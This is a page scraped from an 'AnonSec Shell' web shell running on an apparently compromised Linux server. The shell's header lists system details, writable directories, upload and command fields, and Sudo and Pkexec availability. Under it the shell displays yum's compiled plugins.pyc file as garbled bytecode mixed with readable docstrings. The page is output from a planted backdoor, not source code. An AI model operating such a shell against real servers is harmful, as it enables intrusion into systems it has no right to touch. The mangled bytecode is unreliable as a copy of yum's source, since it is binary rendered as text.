AnonSec Shell
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System : Linux 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/979/cwd/lib/python2.7/site-packages/yum/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Command :

[ HOME ]     

Current File : /proc/979/cwd/lib/python2.7/site-packages/yum/plugins.pyc
�v_c@sSddlZddlZddlZddlZddlZddlZddlZddlZddlTddl	Z	ddl	m
mZddlZddl
mZddlmZddlZddlmZddlmZddlmZd	Zd
efd��YZdZd
�ZeefZidd6dd6dd6dd6dd6dd6dd6dd6dd6dd6dd 6d!d"6d!d#6d!d$6d!d%6d!d&6d'd(6d'd)6d*d+6d*d,6d-d.6d/d06Ze ej!��Z"d1e#fd2��YZ$d3dFd4��YZ%d5dGd6��YZ&ddHd7��YZ'de'fd8��YZ(de(fd9��YZ)de'fd:��YZ*de*fd;��YZ+de*fd<��YZ,de,fd=��YZ-de-fd>��YZ.d!e-fd?��YZ/d'e/fd@��YZ0d-e/fdA��YZ1d*e/fdB��YZ2d/e/fdC��YZ3dD�Z4dE�Z5dS(Ii����N(t*(tParsingErrortConfigParser(tConfigPreProcessor(tfill(tproxy(t_(t
DeprecatedIntcBseZdZRS(sXA simple int subclass that is used to check when a deprecated
    constant is used.
postconfigtInitPluginConduittinittArgsPluginConduittargstDownloadPluginConduittpredownloadtpostdownloadtPreRepoSetupPluginConduittprelistenabledrepostprereposetuptPostRepoSetupPluginConduitt
PluginConduittclosetcleantMainPluginConduittpretranst	posttranstpreverifytranstpostverifytranstexcludetDepsolvePluginConduitt
preresolvetpostresolvetHistoryPluginConduitthistorybegint
PluginYumExitcBs&eZdZddd�Zd�ZRS(sGException that can be raised by plugins to signal that yum should stop.tcCs||_||_dS(N(tvaluettranslation_domain(tselfR1R2((s//usr/lib/python2.7/site-packages/yum/plugins.pyt__init__os	cCs*|jrtj|j|j�S|jSdS(N(R2tgettexttdgettextR1(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pyt__str__rs	(R	R
YumPluginscBsbeZdZdddddd�Zd�Zd�Zed��Zd�Z	d�Z
d�ZRS(	sManager class for Yum plugins.c	Cs|sdg}n||_||_t|�|_||_d|_tjd�|_	||_
||_|dkr~t}nt
|ttf�s�|f}ntt�g|D]}t|�^q�kr�|j	jtjd�n|j|�i|_tj|jd�|jd�dS(svInitialise the instance.

        @param base: The
        @param searchpath: A list of paths to look for plugin modules.
        @param optparser: The OptionParser instance for this run (optional).
            Use to allow plugins to extend command line options.
        @param types: A sequence specifying the types of plugins to load.
            This should be sequnce containing one or more of the TYPE_...
            constants. If None (the default), all plugins will be loaded.
        @param pluginconfpath: A list of paths to look for plugin configuration
            files. Defaults to "/etc/yum/pluginconf.d".
        s/etc/yum/pluginconf.dsyum.verbose.YumPluginsseDeprecated constant TYPE_INTERFACE during plugin initialization.
Please use TYPE_INTERACTIVE instead.RR
searchpathtpluginconfpathtweakreftbaset	optparsertNonetcmdlinetloggingt	getLoggertverbose_loggertdisabledPluginstenabledPluginst	ALL_TYPESt
logginglevelstINFO_2t_importpluginstcmdlinestatexittregistertrun(	R3R<R9R=ttypesR:tdisabledtenabledtt((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4{s*							+

	cKs�tj|d�}|dkr1td|��nt|�}xf|j|D]W\}}|jjtj	d||�|j
|\}}||||j||��qKWdS(s�Run all plugin functions for the given slot.

        :param slotname: a string representing the name of the slot to
           run the plugins for
        :param kwargs: keyword arguments that will be simply passed on
           to the plugins
        sunknown slot name "%s"s$Running "%s" handler for "%s" pluginN(tSLOT_TO_CONDUITtgetR>t
ValueErrortevalt_pluginfuncsRBRKRLtDEBUG_4t_pluginsR<(R3tslotnametkwargst
Csi|_i|_xtD]}g|j|<qWt�|_t�|_x]|jD]R}tjj	|�spqRnx1t
tjd|��D]}|j||�q�WqRW|jr^|j
jtj�r^td�}djt
jtjt|d	|d
|d|��n|jr�xF|jD]8}	|	|jkrq|j
jtjtd�|	�qqqqWn|`|jrxF|jD]8}	|	|jkr�|j
jtjtd�|	�q�q�Wn|`d
S(s/Load plugins matching the given types.
        s%s/*.pysLoaded plugins: s, t is: iPttermtwidthtinitial_indenttsubsequent_indentsNo plugin match for: %sN(R]R[tSLOTStsett_used_disable_plugint_used_enable_pluginR9tostpathtisdirtsortedtglobt_loadpluginRBtisEnabledForRLtDEBUG_3RtjoinRthasattrR<RetcolumnsRKRMRRCRD(
		cCsH|dkrtSx1|D])}tj||�r|j|�tSqWtS(s; Check if this plugin has been temporary enabled/disabled. N(R>tFalsetfnmatchtaddtTrue(RatpluginstusedR~((s//usr/lib/python2.7/site-packages/yum/plugins.pyt_plugin_cmdline_match�s

c	Cstjj|�\}}|jd�d}|j||j|j�rf|j||j|j�rfdS|j|�}|s�t	j
|ddt	jt��r�|j||j|j�r�|j
jtd�|�dSyLtj||g�\}}}ztj||||�}	Wd|j�XWn=|j
jtd�|�dSXt|	d�s�|j
jtd	�|�dStt|	j�s�|j
�||	jtf�dSt|	dt�}
tt f�s�|
�dkrdSxR|
j$tj&td�|�||j'kr�|	|f|j'|<nt(j)td�|��xMt*D]E}|d}
t|	|
�r�|j+|j,|t|	|
�f�q�q�WdS(sYAttempt to import a plugin module and register the hook methods it
        s.pyiNtmainRUs*Not loading "%s" plugin, as it is disabledsPlugin "%s" can't be importedtrequires_api_versions0Plugin "%s" doesn't specify required API versions1Plugin "%s" requires API %s. Supported API is %s.tplugin_typeisYPlugin "%s" uses deprecated constant TYPE_INTERFACE.
Please use TYPE_INTERACTIVE instead.sLoading "%s" pluginsFTwo or more plugins with the name "%s" exist in the plugin search patht_hook(-RmRntsplitR�RCRkRDRlt_getpluginconfR
t	getOptiont



cCs�x�|jD]X}tjj||d�}tj|tj�rBPn|jjtj	t
W|jjtj	t
d�|�dSt�}t
r�}tjd|t|�f��nX|S(s�Parse the plugin specific configuration file and return a
        IncludingConfigParser instance representing it. Returns None if there
        was an error reading or parsing the configuration file.
        s.confsConfiguration file %s not founds/Unable to find configuration file for plugin %ssCouldn't parse %s: %sN(R:RmRnRutaccesstR_OKRBRKRLRMRR>RRtreadfpRR�R�tstr(R3RaRytconffilenametparsert
confpp_objte((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�Rs $	cCs||f|_dS(s�Set the parsed command line options so that plugins can
        access them.

        :param opts: a dictionary containing the values of the command
           line options
        :param commands: a list of command line arguments passed to yum
setCmdLineksN(R	R
RR>R4RRRNtstaticmethodR�RrR�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR8xs,		.	X	tDummyYumPluginscBs eZdZd�Zd�ZRS(s�This class provides basic emulation of the :class:`YumPlugins`
    class. It exists so that calls to don't fail if
    plugins aren't in use.
    cOsdS(s&Do nothing.  All arguments are unused.N((R3RR_((s//usr/lib/python2.7/site-packages/yum/plugins.pyRR{scOsdS(s&Do nothing.  All arguments are unused.N((R3RR_((s//usr/lib/python2.7/site-packages/yum/plugins.pyR��s(R	R
RRRR�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�vs	cBs�eZdZd�Zd�Zd�Zd
d�Zd�Zd�Z	d
d	�Zd
d�Zd�ZRS(sLA conduit class to transfer information between yum and the
			cCs&tj|�}|jj||�dS(s�Send an info message to the logger.

        :param level: the level of the message to send
        :param msg: the message to send
        N(RLtlogLevelFromDebugLevelRBRK(R3tleveltmsgtconverted_level((s//usr/lib/python2.7/site-packages/yum/plugins.pytinfo�scCs&tj|�}|jj||�dS(s�Send an error message to the logger.

        :param level: the level of the message to send
        :param msg: the message to send
        N(RLtlogLevelFromErrorLevelR�RK(R3R�R�R�((s//usr/lib/python2.7/site-packages/yum/plugins.pyR��scCsi|jd|�|jjjr#tS|jjjr6tS|rIi|d6ni}t|jj|��SdS(sOReturn a yes or no response, either from assumeyes already
        being set, or from prompting the user.

        :param msg: the message to show to the user
        :param prompt: the question to ask the user (optional); defaults to 'Is this ok [y/N]: '
        :return: 1 if the response is yes, and 0 if the response is no
        itpromptN(	R�R�RctassumenoRt	assumeyesR�tbooltuserconfirm(R3R�R�R_((s//usr/lib/python2.7/site-packages/yum/plugins.pytpromptYN�scCsddl}|jS(s8Return a string representing the current version of yum.i����N(tyumt__version__(R3R�((s//usr/lib/python2.7/site-packages/yum/plugins.pyt
getYumVersion�scCs
|jjS(s�Return the :class:`optparse.OptionParser` instance for this
        execution of Yum.  In the "config" and "init" slots a plugin
        may add extra options to this instance to extend the command
        line options that Yum exposes.  In all other slots a plugin
        may only read the :class:`OptionParser` instance.  Any
        modification of the instance at this point will have no
        effect.  See the
        :func:`PreRepoSetupPluginConduit.getCmdLine` method for
        details on how to retrieve the parsed values of command line

        :return: the global :class:`optparse.OptionParser` instance used by
           Yum. May be None if an OptionParser isn't in use
        (R�R=(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetOptParser�scCs"tj|j||tj|��S(s5Read a string value from the plugin's own configuration file.

        :param section: configuration file section to read
        :param opt: option name to read
        :param default: value to read if the option is missing
        :return: string option value read, or default if option was missing
confString�s	cCs"tj|j||tj|��S(sfRead an integer value from the plugin's own configuration file.

        :param section: configuration file section to read
        :param opt: option name to read
        :param default: value to read if the option is missing

        :return: the integer option value read, or *default* if the
            option was missing or could not be parsed
R�R�t	IntOption(R3R�R�R�((s//usr/lib/python2.7/site-packages/yum/plugins.pytconfInt�s
cCs"tj|j||tj|��S(s\Read a float value from the plugin's own configuration file.

        :param section: configuration file section to read
        :param opt: option name to read
        :param default: value to read if the option is missing
        :return: float option value read, or *default* if the option was
            missing or could not be parsed
R�R�tFloatOption(R3R�R�R�((s//usr/lib/python2.7/site-packages/yum/plugins.pyt	confFloat�s	cCs"tj|j||tj|��S(s_Read a boolean value from the plugin's own configuration file

        :param section: configuration file section to read
        :param opt: option name to read
        :param default: value to read if the option is missing
        :return: boolean option value read, or *default* if the option
            was missing or could not be parsed
R�R�R�(R3R�R�R�((s//usr/lib/python2.7/site-packages/yum/plugins.pytconfBool�s	cCs"tj|j||tj|��S(s_Read a boolean value from the plugin's own configuration file

        :param section: configuration file section to read
        :param opt: option name to read
        :param default: value to read if the option is missing
        :return: boolean option value read, or *default* if the option
            was missing or could not be parsed
ListOption(R3R�R�R�((s//usr/lib/python2.7/site-packages/yum/plugins.pytconfList�s	cCs|jjj|�dS(siRegister the name of a package to use.

        :param name: the name of the package to register
        N(R�trun_with_package_namesR�(R3tname((s//usr/lib/python2.7/site-packages/yum/plugins.pytregisterPackageNamesN(R	R
RR4R�R�R>R�R�R�R�R�R�R�R�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�s							cBs eZdZd�Zd�ZRS(s%A conduit for use in the config slot.cCs�tjdt�itjt6tjt6tjt	6tj
t6}|tkrjt
tj|tj|��ndS(s�Deprecated.  Register a yum configuration file option.

        :param name: name of the new option
        :param valuetype: option type (PLUG_OPT_BOOL, PLUG_OPT_STRING, etc.)
        :param where: where the option should be available in the config file
        :param default: default value for the option if it is not set by the user
        suregisterOpt() will go away in a future version of Yum.
Please manipulate config.YumConf and config.RepoConf directly.N(twarningstwarntDeprecationWarningR
PLUG_OPT_BOOLR�tPLUG_OPT_FLOATtPLUG_OPT_WHERE_MAINtsetattrtYumConftPLUG_OPT_WHERE_REPOtRepoConftPLUG_OPT_WHERE_ALLtInherit(R3R�t	valuetypetwhereR�ttype2opttoption((s//usr/lib/python2.7/site-packages/yum/plugins.pytregisterOpts		

  cCs>t|jd�r%|jj|�ntjtd���dS(s�Register a new command.

        :param command: the command to register
        :raises: :class:`yum.Errors.ConfigError` if the registration
           of commands is not supported
        tregisterCommands&registration of commands not supportedN(RvR�R�R�R�R(R3tcommand((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�0s(R	R
RR�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyRs	cBseZdZd�ZRS(s'Conduit for use in the postconfig slot.cCs
|jjS(s�Return a dictionary containing the values of the
        configuration options.

        :return: a dictionary containing the values of the
           configuration options
        (R�Rc(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetConf?s(R	R
RR�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR<scBs eZdZd�Zd�ZRS(s!Conduit for use in the init slot.cCs
|jjS(s�Return a dictionary containing the values of the
        configuration options.

        :return: a dictionary containing the values of the
           configuration options
|jjS(s�Return Yum's container object for all configured repositories.

        :return: Yum's :class:`yum.repos.RepoStorage` instance
        (R�trepos(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetReposTs(R	R
RR�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyRHs		cBs eZdZd�Zd�ZRS(s0Conduit for dealing with command line arguments.cCs#tj||||�||_dS(N(RR4t_args(R3R�R<RcR((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4^scCs|jS(s�Return a list of the command line arguments passed to yum.

        :return: a list of the command line arguments passed to yum
        (R�(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetArgsbs(R	R
RR4R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR[s	cBs eZdZd�Zd�ZRS(s)Conduit for use in the prererosetup slot.cCs
|jjS(s�Return parsed command line options.

        :return: (options, commands) as returned by :class:`OptionParser.parse_args()`
|jjS(s�Return a representation of the local RPM database. This
        allows querying of installed packages.

        :return: a :class:`yum.rpmUtils.RpmDBHolder` instance
        (R�trpmdb(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetRpmDBts(R	R
RR�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyRis	cBseZdZd�ZRS(s*Conduit for use in the postreposetup slot.cCs
|jjS(sVReturn group information.

        :return: :class:`yum.comps.Comps` instance
        (R�tcomps(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pyt	getGroupss(R	R
RR�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR|scBs,eZdZdd�Zd�Zd�ZRS(s&Conduit for use in the download slots.cCs,tj||||�||_||_dS(N(RR4t_pkglistt_errors(R3R�R<Rctpkglistterrors((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4�s	cCs|jS(s�Return a list of package objects representing packages to be

        :return: a list of package object representing packages to be
iS|jS(s�Return a dictionary of download errors. 
        :return: a dictionary of download errors. This dictionary is
           indexed by package object. Each element is a list of
           strings describing the error
        (R�(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pyt	getErrors�s	N(R	R
RR>R4R�R�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�s		cBs5eZdZdd�Zd�Zd�Zd�ZRS(sbMain conduit class for plugins.  Many other conduit classes
    will inherit from this class.
    cCs+|r|j}nd}|jjj|�S(s�Return a list of packages.

        :param repo: the repo to return a packages from
        :return: a list of package objects
        N(RIR>R�tpkgSacktreturnPackages(R3trepotarg((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetPackages�scCs|jj|�S(s Retrieve a package object from the packages loaded by Yum using
        nevra information.
        :param nevra: a tuple holding (name, epoch, version, release, arch)
            for a package
        :return: a :class:`yum.packages.PackageObject` instance (or subclass)
        (R�tgetPackageObject(R3tnevra((s//usr/lib/python2.7/site-packages/yum/plugins.pytgetPackageByNevra�scCs|jjj|�dS(siDelete the given package from the package sack.

        :param po: the package object to delete
|jjS(sFReturn transaction set.

        :return: the transaction set
        (R�ttsInfo(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pyt	getTsInfo�sN(R	R
	cBs5eZdZdgd�Zed��Zd�ZRS(s(Conduit for use in solving dependencies.cCs,tj||||�||_||_dS(N(RR4t
resultcodetresultstring(R3R�R<Rctrescodetrestring((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4�s	cCs
|jjS(sDBoolean indicating if depsolving failed due to missing dependencies.(R�t_missing_requires(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pytmissing_requires�scCs&djd�|jj|j�D��S(Ns
css|]\}}||VqdS(N((t.0tprefixR�((s//usr/lib/python2.7/site-packages/yum/plugins.pys	<genexpr>�s(RuR�tpretty_output_restringR(R3((s//usr/lib/python2.7/site-packages/yum/plugins.pyR�sN(R	R
RR>R4tpropertyR	R(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR%�scBseZdZidd�ZRS(s3Conduit to compare different providers of packages.cCs,tj||||�||_||_dS(N(RR4tpackagestreqpo(R3R�R<Rctproviders_dictR((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4�s	N(R	R
RR>R4(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR+�scBseZdZdgd�ZRS(s4Conduit to access information about the yum history.cCs)tj||||�|jj|_dS(N(RR4R�thistory(R3R�R<RcRR((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4�sN(R	R
RR>R4(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR(�scBseZdZd�ZRS(sConduit to verify packages.cCs#tj||||�||_dS(N(RR4R.(R3R�R<RcR.((s//usr/lib/python2.7/site-packages/yum/plugins.pyR4�s(R	R
RR4(((s//usr/lib/python2.7/site-packages/yum/plugins.pyR-�scCs+|jd�\}}t|�t|�fS(s�Parse a string representing an api version.

    :param apiver: a string representing an api version
    :return: a tuple containing the major and minor version numbers
    t.(R�tint(tapivertmajtmin((s//usr/lib/python2.7/site-packages/yum/plugins.pytparsever�scCsLt|�}t|�}|d|dkr0dS|d|dkrHdSdS(s�Return true if API version "a" supports API version "b"

    :param a: a string representing an api version
    :param b: a string representing an api version

    :return: whether version *a* supports version *b*
    ii(R(tatb((s//usr/lib/python2.7/site-packages/yum/plugins.pyR��s((((6RmRqR�R�RPR5R@RLt	constantsR
RRR�R�RttextwrapRR�R;RR�Rtyum.i18nRR�RRt	TYPE_COREtTYPE_INTERACTIVERJRERWRptkeysRit	ExceptionR/R8R�RRRRRRRRRR%R+R(R-RR�(((s//usr/lib/python2.7/site-packages/yum/plugins.pyt<module>s�

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AnonSec Team